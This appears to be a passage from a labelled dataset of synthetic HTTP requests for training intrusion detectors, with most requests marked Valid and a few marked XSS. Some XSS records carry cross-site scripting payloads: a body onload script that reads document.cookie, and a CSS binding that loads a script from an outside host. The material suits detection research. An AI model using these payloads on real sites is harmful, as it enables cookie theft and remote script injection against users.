GET /muAprgs1no.js?CcrEKRTwindow.openW@ni=nGf7oeE7te&nkUeb=%3BmhtsappositionLpnroi&trli=h4sHselectlm5til%7Creo&RorooShfE=8-c-DJ&adedvtws7eu=+mmRe%3Bixtaid&hiioo=9h&avam=15&iFGrrvl1gjhs=22883&jsdz=2742166717&c@6IY2vwlH2R=28936915&e8Iddin6eaqsq=ltdf%259rhs&stdin1SylocationloE=6606&ensveRnstqi=6&ArELstylenetcatI3aD=76217&su=2 HTTP/1.0
Host: 201.204.105.19
Connection: keep-alive
Accept: application/zip, application/*;q=0.6
Accept-Charset: windows-1252;q=0.5, x-mac-arabic;q=0.9, x-mac-korean;q=0.4, x-mac-roman, iso-8859-15
Accept-Encoding: 
Accept-Language: hupsn-tgeNi8, s-0t, ehtpn-duonoy, ct-Aadcytf0, gc-sAfboarl
Cache-Control: max-stale=182
Client-ip: 18.204.47.206
Cookie: wmueoBosn=71726084;w9cnr=pXQIqF2F9m;tl0noi=tai0yYfeesentNrT;joThnresh=lxII
Cookie2: $Version="4"
Date: Sat, 05 Mar 05 19:21:51 CET
ETag: W/"FkesPB9GNCNNHLdcN"
Expect: 100-continue
From: xe7vcre@gune.org
If-Modified-Since: Sun, 29 May 05 13:49:40 UTC
If-Unmodified-Since: Sun, 16 May 04 24:43:09 GMT
If-Match: *
If-None-Match: "OM59uqcagSKxjgwli"
If-Range: Mon, 08 May 06 24:57:21 CET
Max-Forwards: 01
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: aexW uNxasr=6oeb
Authorization: ezgf fhionov=aane
Range: 323-
Referer: /daze.mpeg
TE: chunked;q=0.9
Trailer: If-Modified-Since
User-Agent: Mozilla/1.9 (Machintosh; U; PPC 0.9; al-sh; rv:6.9.6) Gecko/05138023
UA-CPU: MIPS
UA-Disp: 7512,9255,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 884x6494
Via: 0.6 149.236.70.234, FTP/6.5 www.8toedine.js
Transfer-Encoding: compress
Upgrade: e1rns/1.5, 4Ailn/4.5
Warning: 765 www.oiit7.html:14 "goersPi" 
X-Forwarded-For: 151.135.237.72
X-Serial-Number: 28931730
----: -----------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 23797
Start - Id: 46849
class: XSS
PUT /4Fets/r6AnVzPacceptbgsoundOlqcVs/e6dsn.php3? HTTP/1.0
Content-Length: 320
Content-Language: SaaOjhb
Content-Encoding: deflate
Content-Location: /vycredrs/eseitw.jpg
Content-MD5: eXJmaGRjbmVhdWlrc2locg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Dec 08 23:37:27 CET
Last-Modified: Fri, 14 Sep 07 24:03:33 GMT
Host: 13.200.214.240
Connection: close
Accept: application/*;q=0.7, video/quicktime
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 175.15.203.198
Cookie: nmaalirs7=cViokP9clakenrT3;io=;tmpaoem)eYtytprocessing-instructionie;idPehmfirpcbi=0;Anclfs6V=xa;qAusrkM=7eylat)talll Aee;1gueMOaccess_log51pUM=rdwe3ras
Cookie2: $Version="455"
Date: Thu, 14 Sep 06 23:58:02 GMT
ETag: "jzY25ePpsai@EB.S_"
Expect: 100-continue
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Thu, 04 Jan 07 10:27:19 CET
If-Unmodified-Since: Tue, 29 Jan 08 19:51:14 GMT
If-Match: *
If-None-Match: *
If-Range: "6w_gdrs.A4q_We2Ez.Fc"
Max-Forwards: 5
MIME-Version: 2.6
Pragma: kswl='m6Uenf'
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: Digest response="75C1a6947FC49Febb692Bf1Be9E3d58C"
Range: -85
Referer: /ahanarxT/asdoxhn/dtlenm/terumrt.php4
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/2.9 (X11; U; Open BSD i586 4.2; 0e-3i; rv:0.6.3) Gecko/74077150
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 3.1 www.vrdrda.html, 5.0 www.rtdH5A.html:7
Transfer-Encoding: haeay; orrr=gaSyy
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nphesRsennbtbi3=4998677992&embyifteldc48=$t&kEki=nBSN&iha2nee=r0olOtEh&5Lynrtaoe=eIpRW@DHAZtH&0sot=|cDfi&er=ugont1nne&c8tesaBseNfMald=63042&lah8lpaeceth=BoemiaOh4aaws&time1iorrisy=htlbt&a6hswl=80349102&varrboyuQJ2having=n"      ><body%20onload=alert(document.cookie);   >&oWTw=urSM&dBtSi48toer=62

End - Id: 46849
Start - Id: 8414
class: Valid
GET /eV/iVrDC2rTWGCG.jpeg?ovrr=tenaE2n2agoqdir&o4VsM4rn7v2_=eHHhneaEoca9geHl&749h0XV.=fllirf&so=zrm8Hdoeall77H0Pt&NlogfLez=1909282&V3zlnengted93=enwindow.openeocteo%5C&fFGpwzhFcatu@3=88491182&eRGS8Uu=494263&oswG8wC=otstdin7et%3D%25toa&z6oe8pe9=%2BFv%3E&@NKgVwopenowS=oiw HTTP/1.0
Host: 176.172.65.52:80
Connection: keep-alive
Accept: text/plain
Accept-Charset: iso-8859-9, x-mac-ce, big5;q=0.0, koi8-r;q=0.6, windows-1257
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.0
Cache-Control: min-fresh=967
Client-ip: 199.138.60.143
Cookie: 6osuanycksi3o=621488;8aeiiocAtt6=execxgjn;nddb=lco;uo.mlsZ@tq8YI=i.vqzUdz_m;6WtTO9L-Shttp=idwnn3;tsmiitero=ksj
Cookie2: $Version="94"
Date: Tue, 03 May 05 19:18:11 UTC
ETag: W/"vhoIZfNY4LM5Difz"
Expect: 100-continue
From: owtfe@Psfnit.ch
If-Modified-Since: Fri, 27 May 05 01:55:23 GMT
If-Unmodified-Since: Tue, 28 Jun 05 03:17:37 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Basic cnJ0RURhWDpvdWV2bw==
Authorization: cooda Eg8c=shceEAae
Range: 994131-66069
Referer: http://tmdss.biz/sss8k.gif
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 3.6; mc-fh; rv:8.1.6) Gecko/98301726
UA-CPU: MIPS
UA-Disp: 9749,6112,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 928x374
Via: 9.4 111.207.105.120
Transfer-Encoding: gzip
Upgrade: dvu6s/4.4
Warning: 051 142.192.100.17 "aDe4she" 
X-Forwarded-For: 193.245.215.144
X-Serial-Number: 426956311564
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8414
Start - Id: 13697
class: Valid
GET /xQ@38f6dqc/s72yyV7LU57g1uQt/Oohsrssi/zGUW/tji06tdCailee0nL/7iiois8neaEaPirhr/pWtmndbo1ttish0slayc/aK1C/7i/Scgdnnnstakwme/sauSsIqw.htm?Facel=e7ejGoln HTTP/1.1
Host: 15.196.94.89
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *
Accept-Encoding: 
Accept-Language: contnt-tercipdi;q=0.1, nnjNa-oTogql, efe-8n, setiysea-yii7, er-oneodtu;q=0.8
Cache-Control: no-store
Client-ip: 8.252.160.20
Cookie: tuthatrpTshr=LLl-oOeln;gi0lifeete=N ;sps=01485;Loatlmc='oio;veVDf3Iv8GSN=6777707;8n=einsertoW6yaechoreHea1Ttt ae
Cookie2: $Version="554"
Date: Sun, 20 Sep 09 19:10:25 UTC
ETag: W/"h1UUMblmY5tubv8d"
Expect: 100-continue
From: s29eksF@wcAom7est.fr
If-Modified-Since: Fri, 31 Oct 08 23:51:55 GMT
If-Unmodified-Since: Tue, 21 Oct 08 22:47:57 CET
If-Match: "SFI6nCGASwXQbBgP"
If-None-Match: "5dm5YN2pQtNeCGhPw"
If-Range: Wed, 13 Apr 05 24:43:24 UTC
Max-Forwards: 00
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic c251dXl0OmdoempzdQ==
Authorization: itaAt ua0ako=mdfeoah
Range: 7428-
Referer: /eiru.mdb
TE: trailers,trailers,chunked;q=0.4
Trailer: Authorization
User-Agent: Mozilla/4.5 (Machintosh; U; Mac OS X 7.9; tt-so; rv:0.7.6) Gecko/52374679
UA-CPU: PowerPC
UA-Disp: 146,6247,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 757x935
Via: HTTP/8.0 www.hdelb.htm, 8.5 www.nltdw.js
Transfer-Encoding: gzip
Upgrade: eeelg/7.7, utMy/3.6, isxk/2.7, aitvl/7.3
Warning: 963 www.nr6uio.htm "hGclte" 
X-Forwarded-For: 18.131.227.185
X-Serial-Number: 1852790108043394492
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13697
Start - Id: 7556
class: Valid
PUT /_FLK4OxselectQwHoF/ry/8ul/m6lvR38./rq.gjbK8k1IA/spNshmee5ho/fk_2IQsnz/a0lI.asmx? HTTP/1.1
Content-Length: 196
Content-Language: r
Content-Encoding: gzip
Content-Location: http://www.Ts3en.com/isxD/mojb/citeaiv/YrRresj.mpeg
Content-MD5: YUhkYVduY2lyc29kc0VsYg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 17 Jun 05 07:12:38 GMT
Last-Modified: Thu, 10 Jul 08 23:13:41 UTC
Host: 66.112.19.212:9422
Connection: keep-alive
Accept: text/*, image/gif
Accept-Charset: cp-936;q=0.5, euc-jp, windows-874
Accept-Encoding: deflate;q=0.9, compress
Accept-Language: L-st, 5ans-injpoNd;q=0.9, ietsS-gesiegE, Eeue-iwnsk, eurn8-to;q=0.8
Cache-Control: only-if-cached
Client-ip: 13.235.197.251
Cookie: DB33=gmnsmnh33;too=fwinntswp-e~t;.72rX7kvM=22505;0giheN8t=0062;Xakd=scrlo6e;EMo7=n
Cookie2: $Version="01"
Date: Mon, 27 Mar 06 06:58:39 CET
ETag: W/"3M9aOoOa8PbHxPm"
Expect: jh9wceix=inmii;Rreo=wjhit
From: nanSyva@xAweeehqTs.de
If-Modified-Since: Tue, 22 Sep 09 21:05:29 CET
If-Unmodified-Since: Fri, 30 Apr 04 15:27:43 UTC
If-Match: "oZXk7vg5OefTZLeCv"
If-None-Match: *
If-Range: *
Max-Forwards: 0523
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: NTLM d2llb2V3b3ZodXNkb3RkVGFFaGJoMHFsbnVxbG1hbXQyc2V6b2hoYQ==
Authorization: Basic YmVpMXA6RWdydGhpYQ==
Range: -9533
Referer: /n7rEw2x/roeso/TPeh4ae.mpg
TE: chunked;q=0.0,trailers,trailers
Trailer: Via
User-Agent: Mozilla/7.5 (Windows; U; Win 9x 4.0; oe-tv; rv:0.9.9) Gecko/92681653
UA-CPU: x86
UA-Disp: 845,5230,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 5452x8667
Via: 5.6 www.td0hm.shtml, 0.5 74.123.21.42:25131, HTTP/7.6 25.219.173.142:0237
Transfer-Encoding: identity
Upgrade: 5ANuc/0.3, Ddhee/6.4
Warning: 380 www.nitEteny.jpg "6ehtIotoedTnoU" "Sun, 17 Jan 10 07:32:41 CET"
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 49024
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bdsbnrCdeduh=gtfewdeht&yreDuKWQtq=htmp&aS2Z=6135&i2e=rbuvNcS&Fusrxp_copyEMnOrV=535109143&f3Emb6rehnen=01169056&Ybw@aCiK=JypuerhhttDoe&t5rit=7366184&9md6iio=ea&rglamdpwiroadBt=nNCV_PJiWs&oldBtg=oOI

End - Id: 7556
Start - Id: 14500
class: Valid
GET /r1S0zG5-iO/crcQcispe9eihmhdriC/Ou5ROig/aNgtzaentoofjnear9t/elagoweehht56F7the/kyusrscript/wuhdaatisAs/l03QApP_ci/eeA/u4hkeetOy.sh? HTTP/1.1
Host: 87.27.75.241:7
Connection: keep-alive
Accept: audio/x-wav, image/jpeg
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 156.195.173.2
Cookie: rshhl=5947106;feM9sytauhuk=ta1
Cookie2: $Version="909"
Date: Thu, 07 Jan 10 12:50:48 GMT
ETag: W/"SMjDachPwMiLWHDIj"
Expect: 100-continue
From: nhsko@onEumg.net
If-Modified-Since: Sun, 04 Feb 07 23:47:09 UTC
If-Unmodified-Since: Fri, 14 Apr 06 23:15:58 GMT
If-Match: *
If-None-Match: "as@iyP3.SScqOQO"
If-Range: *
Max-Forwards: 0851
MIME-Version: 5.2
Pragma: itrOruyh='n'
Proxy-Authorization: NTLM cHRub2xscmZmcHR0UHNlbmxhcWFkMURlZUUxbVllaG1yd3Bo
Authorization: NTLM cm5udnloNm5mc3Y2aXRvc2g1aWhvM3RpYWZ0Y2R0c2U=
Range: 06557-0,55484-,7261-
Referer: http://ey6e.de/AaShEein/eddi/h9Es/wdtNlsA/sauHo.doc
TE: trailers,trailers,gzip
Trailer: Warning
User-Agent: Mozilla/8.6 (X11; U; Linux i586 3.7; xb-jt; rv:4.8.6) Gecko/69204266
UA-CPU: StrongARM
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 866x6745
Via: 7.2 16.249.167.120, 0adsi/8.7 www.eiycobrh.html, FTP/9.6 www.one7h.js
Transfer-Encoding: identity
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 242 174.80.186.170:3881 "srhnvra8" 
X-Forwarded-For: 33.83.28.62
X-Serial-Number: 01337
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14500
Start - Id: 11706
class: Valid
GET /mljjs/if74SY0RHbU/mZK-jIJUp.png?o@R1FS=Eaeo5oelpcm&Ihdxeqsprta=tle4&6pledbu5goaehg=a+pars&swysc=og%2B%7Ehr&sa=eEi&he55syehog6seni=itF+oi3t4ndstRns%27lh&ITKG=p%5Css&uRVQe=ttdempkmedlapn&elWGid0d4-=nqr3bino9teh9i&5oyhehodfRr=libr2HOkrperltaioeigroup+by&AmBsvE2irMaieea=Shrfrwi43Psld0Aex&@uMii6H3MiM=0&e2iftka2eoiut=eakzv&ukhsrimre2g=8&4c3tH=40696 HTTP/1.0
Host: www.nhleRo.biz
Connection: mkbkgs
Accept: audio/x-wav
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: sgeh-t;q=0.6, eo-e0e, e-yfhtuE;q=0.0
Cache-Control: no-transform
Client-ip: 228.241.203.171
Cookie: nhfr=6312;trsSa=tao oeGct shutdownkgINo;dahrinHvjNl=+oo1tamkFseg
Cookie2: $Version="830"
Date: Sun, 17 Aug 08 14:30:54 GMT
ETag: W/"VpON5UPON.AF21N6"
Expect: 100-continue
From: sirxnDi@0oociO.fr
If-Modified-Since: Mon, 14 Sep 09 12:51:09 CET
If-Unmodified-Since: Wed, 20 Jun 07 23:37:20 CET
If-Match: ".wAAcK-WcSiiZb3Y"
If-None-Match: *
If-Range: "CdkhN_J-nq4eyeMx"
Max-Forwards: 6661
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="ciapc"
Authorization: Digest uri=/habrao/xscc/tceeitn/sePky4lo/ihfn.txt
Range: 9808-4454,-4,572-193568
Referer: http://www.tdos.be/4dngpmv/nwhs/Intew/rtjat/AnebsOn.css
TE: chunked;q=0.2,trailers,chunked
Trailer: Accept
User-Agent: dE3new6nthxh
UA-CPU: x86
UA-Disp: 940,7536,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8474x4418
Via: HTTP/9.7 www.oiai.htm
Transfer-Encoding: identity
Upgrade: tg2r/9.0, fere/5.1, Samd/0.1, iasFl/4.6
Warning: 482 www.edeet.html "st2tianaieN" 
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 2344723441
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11706
Start - Id: 22914
class: Valid
GET /DieefdastateslbneAfn/CKVarufo2sam/hGsTOAUjbMvY3u/hopvsjOelsmndzdhiuiV/sTbOfNt07WvR2/eEo9bq/Et7hiibb8/bVV/ds.css?boot.iniM-Zspmocha=d+2&RwyvaMOa7rbgsound=thnCQHkk&emwew4ptuR7ff=%3Ftrteiao&mRe=tiieonvfm&pwirenbp9=244453&9moinmriebsue=xmacecO&hYhgnpdvnmewa3=scriptHcat%7Ci9sid+ya%3F&2usan=y1%40le5XJK&82Rot78iqm=poiIMtaud HTTP/1.0
Host: www.ceae.com:80
Connection: hnRRand
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.0, deflate, deflate;q=0.5
Accept-Language: *
Cache-Control: max-age=8136
Client-ip: 238.41.42.217
Cookie: uaiseigtoptt=7;Odavut=1;m2izdHiYPohe=c0ma;soio=rs kls(6gooe$rdc
Cookie2: $Version="805"
Date: Mon, 26 Nov 07 10:51:41 UTC
ETag: "@GM7rn-X4zBEjgFECt."
Expect: 100-continue
From: 8dmmAuhr@htieh.gov
If-Modified-Since: Sun, 05 Sep 04 23:25:41 GMT
If-Unmodified-Since: Thu, 12 Mar 09 16:47:05 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 25 Dec 08 05:06:25 UTC
Max-Forwards: 756
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic c3RDZWVvbDpvbmxUYWF5
Authorization: Basic c3BhbjpOU3N6dFFs
Range: -6039,4724-
Referer: http://2nG5tag.it/ehmcc/nmwea/bvcottg.jpeg
TE: trailers,chunked;q=0.1,trailers
Trailer: Accept-Encoding
User-Agent: snJ1bC8fdo http://www.fduoo.fr
UA-CPU: x86
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 423x053
Via: 5.1 www.82nrl8.shtml
Transfer-Encoding: deflate
Upgrade: aHpmg/5.8, 48c/5.3
Warning: 383 www.enRF.jpeg "I3teed" 
X-Forwarded-For: 26.249.21.162
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22914
Start - Id: 30677
class: Valid
GET /rrIcotleY/jqbeE_h.dll?qn20aTd3W9vtv=bi3tiT%2Ftmlaestdin&ot=anoi&eirefqeg=a9kWF8-tb&oeyhdteo=5aefuuZtL&L9BHu=riea4chjuya6ict&it=8691&tie81mOlxhteosw=taamchoh&oe=1ron%3EsassEiia&gsp=aLsRa%40oi9ldnt&bRLgRw=91068&et4Eho94gn9d=cltltui12re HTTP/1.0
Host: www.6rpd.cz
Connection: close
Accept: audio/basic;q=0.8, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 78.145.112.44
Cookie: 3xXSJ@_EbB=1emtc2Reaessea7;tmbee=esiIghyoaoel ;8TFmlzz_hAPF=i|teo/a
Cookie2: $Version="1"
Date: Thu, 14 May 09 16:57:45 GMT
ETag: W/"OelsPWMPvfoQSk@SA0pH"
Expect: Eqn5rieV=nceO9Z
From: Sunw8ia@ecjo.be
If-Modified-Since: Sat, 25 Oct 08 02:17:28 GMT
If-Unmodified-Since: Sun, 18 Dec 05 14:33:37 UTC
If-Match: *
If-None-Match: *
If-Range: "1glyzDWJj9.gYif"
Max-Forwards: 5208
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM c2N2b3NkYTNpc3ZidHJpNmVvaWFlbG9sYmlpYWJhN2htTmJhQ3RpZg==
Authorization: uhhpsI kfne=Mj8maala
Range: 174-63482
Referer: /aOerano.txt
TE: trailers,trailers
Trailer: Accept
User-Agent: jtrff6c7feonan
UA-CPU: PowerPC
UA-Disp: 9503,087,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 7462x1873
Via: FTP/5.2 250.54.215.0, HTTP/9.5 147.119.94.111, 8Tdtat/2.1 www.otzeN.jpg
Transfer-Encoding: compress
Upgrade: dsfrle/2.8, lnh/9.9, ntnamc/7.2, hlt/5.9
Warning: 834 64.62.125.81 "mrreedes" 
X-Forwarded-For: 90.32.42.192
X-Serial-Number: 62673072943112918
----: ---------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 30677
Start - Id: 14401
class: Valid
GET /eoeider/m@CCPvbdF/a9zfbm@df/o1ac/jqopen7llocationU0Zaccess_logHphplG/oensdsleaapnemdN/6WIA/.xxqncRQffppNQH/nyafmei7nt6sc/acacdhao0mehh/R2exJxhL_9drop/nsOevt5siihh.jpg?Weigoozxuu=4653007590&ahei8ft=aonzNe&srantlwh=rxcglxLfNG&HJYzj2w=s%24+ze&window.openIanchM.Z=zkwaohtif12&isystewr=cUEe.fIzbUt&1gt=55_EUX-u0&ikeZso=eBXltU HTTP/1.1
Host: www.teiexua.fr
Connection: keep-alive
Accept: text/plain;q=0.3, image/gif, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: E-aeE, 8L0niSda-os5ole6;q=0.0, gmeuld-scwxm;q=0.9
Cache-Control: 9lIenge='oqs4Ot'
Client-ip: 242.114.172.151
Cookie: tol=tBUJZc;hjmqUee5=Lwitttx|utor;myeeanox1h9=Oar2dnd>a'?;cp6viqjgU=opXKDP0-;24naUiUeBKv0=aMGz7e
Cookie2: $Version="325"
Date: Mon, 12 Oct 09 17:09:46 CET
ETag: W/"cqjrqZ@6YYakjiimuP"
Expect: osi9
From: Rt7eei@haruek9a0.st
If-Modified-Since: Fri, 09 Apr 10 20:36:31 CET
If-Unmodified-Since: Sat, 09 Sep 06 08:31:07 GMT
If-Match: *
If-None-Match: "jW6hbNQt0xSG7Il."
If-Range: *
Max-Forwards: 6
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM QVh0VFlscml0Wnd4dHJlbW9lYWVnQ2huaDJoaW5yc2FoZHhiaXhjdHM=
Authorization: Digest realm
Range: 30-
Referer: http://c9kwd.uk/awd8zon/eldhLe.js
TE: chunked
Trailer: Authorization
User-Agent: tScewojntagryczwevou
UA-CPU: StrongARM
UA-Disp: 8055,616,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 9340x0516
Via: 3.1 107.130.218.2, HTTP/4.2 www.dRRhsL.gif:32, 5.8 www.tta5a.html
Transfer-Encoding: compress
Upgrade: iidn/5.9, wiont/0.5
Warning: 239 www.iiaa.jpg "v1nj0rT7djelun" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14401
Start - Id: 47193
class: XSS
GET /rE8DdhJ/etdhkynu/rrnmmnigmim2utraea/dznUnull1kZsamjPCwX/EVEYnEDdsWhC5Y/l7dgiNlHC./tHRv_/e_Ft4H3rhiFF0xN/EotuqlioN/kNL5/tbxjppIn.php?XbiphpD_=18&TAmphpMOsE3jE5=ed&a8KB9inputzPpF.=41542&9MlllzhttpsGd=%24h&kt7e=5212516&mtPsyrS=75536936&zenhnh=%3Cdiv++++style+++%3D+++%22++binding%3A+url%28%5Bhttp%3A%2F%2Fwww.raiconet.com%2Fscript%2Fpsh99riR.cgi%5D%29%3B+++%22++++%3E&xso0hme0nsqbvi=1371519 HTTP/1.1
Host: 213.156.230.230
Connection: keep-alive
Accept: text/html;q=0.2
Accept-Charset: x-mac-greek, x-mac-icelandic;q=0.1, iso-8859-1
Accept-Encoding: 
Accept-Language: Y-9eqAnnaG, gtoadam-lEipecrs, oedeaJ-rlo;q=0.0
Cache-Control: no-store
Client-ip: 34.140.216.85
Cookie: iarbsitmelUo=52;eddhS=4vF;JOnullx=87012;CDpjN=933017345;da=dztcedi;RP0uW9b=3111564
Cookie2: $Version="4"
Date: Tue, 25 Jan 05 01:49:52 GMT
ETag: W/"M.D_V9Hhyz7aLO5"
Expect: ge5it=aiet
From: odfe4mcc@abteyQ.be
If-Modified-Since: Sat, 12 Dec 09 14:37:03 UTC
If-Unmodified-Since: Sun, 12 Jun 05 13:30:07 CET
If-Match: "RRAglu8YSeaNw1b6Zc@C"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: n0ntl bt2Ndpz=9yldlwu
Authorization: Digest realm
Range: 671-463
Referer: http://eqhjl3hd.be/ebsoat.swf
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: otheltshto (hAs_X-NE; nx-8BXDoo)
UA-CPU: 68000
UA-Disp: 934,693,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 739x565
Via: tw9f/9.3 6.85.199.44:3144
Transfer-Encoding: deflate
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 533969856895
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47193
Start - Id: 8204
class: Valid
GET /e.oKydz.u7/iC_6kpFTuT6FkhPPcp/i8tgfb56y48sz8@0jB/dlshicssSxossu7thaun.cfm?neexierefs=6&40Kp6=ei&s2anstTv=i%28nEjiles&ino4oeIifs=srAeWqnN9rm&laRsMninta=619516&af5=2814549&Xote4=tmsJC8T&tfaNhrToldTe4ks=s567&dp=0-hrd%24i0vstylerh%3D+&rNrMnph-EbkrcpQ=90825 HTTP/1.1
Host: www.Eantdto.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, deflate, deflate;q=0.1, compress;q=0.7
Accept-Language: heht-a2tf
Cache-Control: e=etaisct
Client-ip: 151.189.48.156
Cookie: mtsemtqaxnseLem=$ (e;irc=3hci;FaUM-=4491645;hrnailme9=O ;re8uor5=rgYbRTHtFR
Cookie2: $Version="518"
Date: Thu, 02 Apr 09 14:17:17 GMT
ETag: W/"rf948Xi40pUSX0vK"
Expect: 100-continue
From: tnjiee0n@rlf3ge.de
If-Modified-Since: Wed, 24 Mar 10 24:55:54 UTC
If-Unmodified-Since: Tue, 01 Sep 09 20:05:37 UTC
If-Match: "z47GMOtel2GJoZQKi"
If-None-Match: "NpsUqvEjnAQPAV3r3"
If-Range: Tue, 20 May 08 03:00:59 GMT
Max-Forwards: 95
MIME-Version: 1.5
Pragma: Y=istrEfdo
Proxy-Authorization: Digest cnonce="rtmdnshp"
Authorization: Digest opaque="gbiy"
Range: 972-39
Referer: /tthee/d1lee/Mhdll/iixeaiy/stmmu.txt
TE: chunked;q=0.2,gzip;q=0.6,chunked;q=0.4
Trailer: Accept-Charset
User-Agent: AnUonfe (rKhoBh75-B; ob@0Ux; tIlA3VL83P)
UA-CPU: x86
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 1852x378
Via: HTTP/5.0 145.244.241.252:25, FTP/0.1 www.vlkr.js:4
Transfer-Encoding: gzip
Upgrade: 9o6e/7.7, eaTRi/7.4, yaoEli/5.7, rnj/7.6, pad/2.0
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 216.1.28.119
X-Serial-Number: 8468350
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8204
Start - Id: 4158
class: Valid
PUT /l4r/eooaMeE4rrDnoGoeemr/3dvi/uede.asmx? HTTP/1.1
Content-Length: 106
Content-Language: sxet,Hhizar,looylus
Content-Encoding: compress
Content-Location: /yteI/u6viH/Ectmle/tiohdwe.dll
Content-MD5: bHJlZXN0cmxyaHc3dGVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 07 Jan 07 20:24:06 GMT
Last-Modified: Fri, 24 Apr 09 10:38:34 CET
Host: 141.221.207.228
Connection: xpBcm7n
Accept: application/zip;q=0.1, video/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 27.207.2.84
Cookie: srbivetor=aMe;rfu7rvhInaon2=0535508;mhslupphny=Ostyleeqstyleaki3tn;7nhnlvw=tn
Cookie2: $Version="772"
Date: Mon, 23 Feb 04 11:36:22 CET
ETag: W/"TOzFfs1syesKdnln"
Expect: cads
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Mon, 04 May 09 16:31:54 CET
If-Unmodified-Since: Fri, 14 Jul 06 03:25:05 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 23 May 04 02:50:34 UTC
Max-Forwards: 9665
MIME-Version: 3.7
Pragma: Onla=kteneylp
Proxy-Authorization: Digest nc=7DDA6ada
Authorization: NTLM aG9hbHRDY2F0ZGVucmV0c0FsZW9xaHJpZ2Q3YWx0MmFJbGFlaGRhOQ==
Range: -9,-905
Referer: /1hn8Ed.php4
TE: trailers,trailers
Trailer: TE
User-Agent: eBbgNR http://www.bZemewuo.uk
UA-CPU: x86
UA-Disp: 192,906,16
UA-OS: Windows 98
UA-Color: color8
